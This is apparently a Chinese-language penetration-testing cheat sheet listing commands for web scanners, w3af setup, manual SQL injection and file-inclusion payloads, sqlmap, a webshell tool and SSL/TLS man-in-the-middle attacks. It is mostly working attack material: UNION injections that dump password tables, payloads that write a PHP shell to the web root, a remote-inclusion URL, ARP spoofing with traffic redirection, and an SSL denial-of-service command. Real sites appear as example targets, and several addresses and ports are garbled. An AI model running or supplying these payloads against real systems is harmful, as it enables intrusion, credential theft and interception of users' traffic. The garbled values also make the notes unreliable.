扫描工具
- Nikto版本更新:nikto –update
- 查看使用插件:nikto –list-plugins
- 扫描目标:
-
-
- nikto –host http://www.baidu.com/web/
- nikto –host 19168.1.109 –port 80
- nikto –host www.baidu.com –port 448443,995 –ssl
- nikto –host 12.168.1.103 –port 80 –evasion 167
- nmap –p80 192.168.1.0/24 –oG - | nikto –host –
- nikto –host https://www.baidu.com –useproxy http:locallhost:8087
-
-
skipfish漏洞工具使用
- Skipfish –o test http://www.ebay.com/usr/
- Skipfish –o test @url.txt
- 通过自带字典扫描;
- 找到字典:dpkg –L skipfish | grep wl
- Skipfish –o test –S /usr/share/skipfish/dictionaries/minimal.wl http:1.1.1.1
- 利用提取cooking进行登录扫描:
- Skipfish –A user:pass –o test http://1.1.1.1
- Skipfish –C “name=val” –o test http://1.1.1.1
vega工具使用
- 官网下载:https://subgraph.com/vega/download/
- 进入压缩包存放目录,输入命令:
unzip VegaBuild-linux.gtk.x86_64.zip(压缩包的名字) -d vega/
- 安装后,输入命令
./Vega
运行vega - 若报错,可能是Java版本过高,我们需要调低Java版本,输入命令:
update-alternatives --config java
安装W3af
- 更新源:
打开更新源列表:vi /etc/apt/sources.list
#更改更新源
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb http://ftp.de.debian.org/debian buster main
#更新命令:
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade –y
- 下载:git clone https://github.com/andresriancho/w3af.git
- 安装pybloomfiltermmap 命令:apt install -y python-pybloomfiltermmap
- 修改配置文件:
- vim w3af/core/controllers/dependency_check/requirements.py
-
- PIPDependency(‘pybloomfilter’, ‘pybloomfiltermmap’, ‘0.3.15’)
- PIPDependency(‘OpenSSL’, ‘pyOpenSSL’, ‘16.2.0’)
- PIPDependency(‘lxml’, ‘lxml’, ‘3.7.1’)
-
- vim w3af/core/controllers/dependency_check/platforms/mac.py
-
- MAC_CORE_PIP_PACKAGES.remove(PIPDependency(‘pybloomfilter’, ‘pybloomfiltermmap’, ‘0.3.15’)
-
- vim w3af/core/controllers/dependency_check/requirements.py
- 安装python-pip:apt-get install python-setuptools python-pip
- /tmp目录生成脚本:(1)./w3af_gui (2)./w3ad_console
(3)./tmp/w3af_dependency_install.sh
- 更新npm:(1)npm install –g retire@2.0.3(2)npm update –g retire
- 使用命令版:(1)./w3af_console (2)sudo pip install xdot==0.6
- 安装图形化插件:
- 1.下载deb二进制包:
-
- wget http://ftp.br.debian.org/debian/pool/main/p/pywebkitgtk/python-webkit_1.1.8-3_amd64.deb
- wget http://ftp.br.debian.org/debian/pool/main/w/webkitgtk/libjavascriptcoregtk-1.0-0_2.4.11-3_amd64.deb
- wget http://ftp.br.debian.org/debian/pool/main/p/python-support/python-support_1.0.15_all.deb
- wget http://ftp.br.debian.org/debian/pool/main/w/webkitgtk/libwebkitgtk-1.0-0_2.4.11-3_amd64.deb
-
- 依次安装二进制包:
-
- dpkg -i libjavascriptcoregtk-1.0-0_2.4.11-3_amd64.deb
- dpkg -i python-support_1.0.15_all.deb
- dpkg -i libwebkitgtk-1.0-0_2.4.11-3_amd64.deb
- dpkg -i python-webkit_1.1.8-3_amd64.deb
-
- 修复依赖: apt-get -f install –y
- 1.下载deb二进制包:
- 运行图像化:./w3af_gui
- 如果缺失安装:apt-get install python-getsourceview2
手动漏洞挖掘
1. 字典以及破解字符目录:/usr/share/wfuzz/wordlist/
2. url测试结尾追加:
• ?file=../../../../etc/passwd
• ?page=file:///etc/passwd
• ?home=main.cgi
• ?page=http://www.a.com/1.php
• http://1.1.1.1/../../../../dir/file.txt
• “.” “%00” #绕过文件扩展名
- SQLဳ注入:
- ' union select database(),substring_index(USER(),"@",1)--
- @@datadir̵、@@hostname̵、@@VERSION̵、user()、@@version_compile_os、database()
- 链接字符串:CONCAT_WS(CHAR(32,58,32),user(),database(),version())
- • ‘ union select table_name,table_schema from information_schema.tables--+
- • ' UNION select table_schema,count(*) FROM information_Schema.tables group by table_schema –
- • ' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'--+
- • ' union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users’--+
- • ' union select user,password from dvwa.users--+
- • ' union select user,password from users--+
- • ' union select null, concat(user,0x3a,password) from users--+
- 使用john破解密码的hash获得密码明文:
- john --format=raw-MD5 dvwa.txt
- 读取文件: • ' union SELECT null, load_file('/etc/passwd')--+
- 写入文件:• ' union select null,"" INTO DUMPFILE "/var/ www/a.php" --+
- Mysql账号:
- cat php-revers-shell.php | xxd -ps | tr -d ‘\n’
- • ' union select null, (0x3c3f706870) INTO DUMPFILE '/tmp/x.php'—
- 保存下载数据库:
- • ' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/ tmp/a.db'—
Sqlmap注入
1. • sqlmap -h / -hh / -u
2. sqlmap -d "mysql://user:password@192.168.20.10:3306/dvwa" -f --users --banner --dbs --schema –a
3. sqlmap -u url --data="name=value&pwd=value"后参数:
• --current-user
• --current-db
• --hostname
• --users
• --privileges -U username
• --roles
• --dbs
• --tables, --exclude-sysdbs –D dvwa
• -T users -D dvwa -C user –columns
Webacoo 控制工具
- 生成服务端:• webacoo -g -o a.php
- 客户端连接:• webacoo -t -u http://1.1.1.1/a.php
ssl证书攻击
1. 查看证书:openssl s_client –connect www.baidu.com
2. 查看tls支持的证书密码:sslscan –tlsall www.taobao.com:443
3. 检查证书:
sslscan –show-certificate –no-ciphersuites www.taobao.com
sslyze –regular www.taobao.com
nmap --script=ssl-enum-ciphers.nse www.taobao.com
网站:https://www.ssllabs.com
4. 根据证书 访问:openssl s_client –tls1_2 –cipher ‘加密算法’ –connect url
5. 伪造证书:
a.生成证书私钥: openssl genrsa -out ca.key 2048
b.利用私钥生成证书: openssl req -new -x509 -days 1096 -key ca.key -out ca.crt
6.ssl/tls 中间人攻击iptables:
a. 启动路由:sysctl –w net.ipv4.ip_forward=1(/proc/sys/net/ipv4/ip_forward)
b. iptables端口转发规则(将劫持的流量数据转发到指定端口):
• iptables -t nat -F (清除端口规则)
• iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
• iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443 • iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA
• iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS
• iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS
• iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S
• Iptables -t nat –L
C. 启动SSLsplit开始劫持: arpspoof –I eth0 –t 192.168.0.115 192.168.0.1
d. 生成劫持信息日志:sslsplit –D –l connect.log –j /root/test –s test/ -k ca.key –c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
6.ssl/tls 中间人攻击Mitmproxy:
a. iptables –t nat –F (清除端口规则)
b. iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --toport 8080
7. SSLstrip(客户端中间人之间明文传输): sslstrip -l 8080
8.流量占用攻击:thc-ssl-dos ip
使用arpspoof实施中间人攻击
用omnipeek抓包:
- Windowns端命令:arp –d
Ping ip
- Arp筛选出数据包:
-
-
-
- 1. 右键发送,修改适配器
- 2. 设置数据包数据。
-
-
-
命令:dsniff